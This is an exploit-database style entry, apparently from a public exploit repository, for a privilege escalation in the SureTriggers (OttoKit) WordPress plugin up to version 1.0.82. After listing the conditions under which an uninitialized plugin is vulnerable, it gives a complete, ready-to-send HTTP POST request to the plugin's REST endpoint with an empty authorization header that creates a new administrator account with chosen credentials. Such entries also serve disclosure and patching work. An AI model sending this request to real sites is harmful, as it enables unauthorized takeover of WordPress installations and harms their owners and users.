9044a602bb
6 changes to exploits/shellcodes/ghdb Apache ActiveMQ 6.1.6 - Denial of Service (DOS) SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation WordPress Depicter Plugin 3.6.1 - SQL Injection Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation VirtualBox 7.0.16 - Privilege Escalation
33 lines
No EOL
1.3 KiB
Text
33 lines
No EOL
1.3 KiB
Text
# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
|
|
# Date: 2025-05-7
|
|
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
|
|
|
|
# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
|
|
|
|
Conditions for Exploitation
|
|
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>
|
|
|
|
The vulnerability can be exploited under the following circumstances:
|
|
|
|
1. OttoKit must be installed and activated on the target WordPress site.
|
|
2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
|
|
in the database).
|
|
3. The target site displays the REST API endpoint
|
|
'/wp-json/sure-triggers/v1/automation/action'.
|
|
|
|
------------------------------
|
|
HTTP Request
|
|
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
|
|
The following request targets the
|
|
/wp-json/sure-triggers/v1/automation/action endpoint to create an
|
|
administrator account:
|
|
|
|
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
|
|
Host: [target-site]
|
|
Content-Type: application/x-www-form-urlencoded
|
|
St-Authorization:
|
|
Content-Length: [length]
|
|
|
|
selected_options[user_name]=new_admin&selected_options[user_email]=
|
|
attacker@example.com&selected_options[password]=StrongP@ssw0rd123
|
|
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists |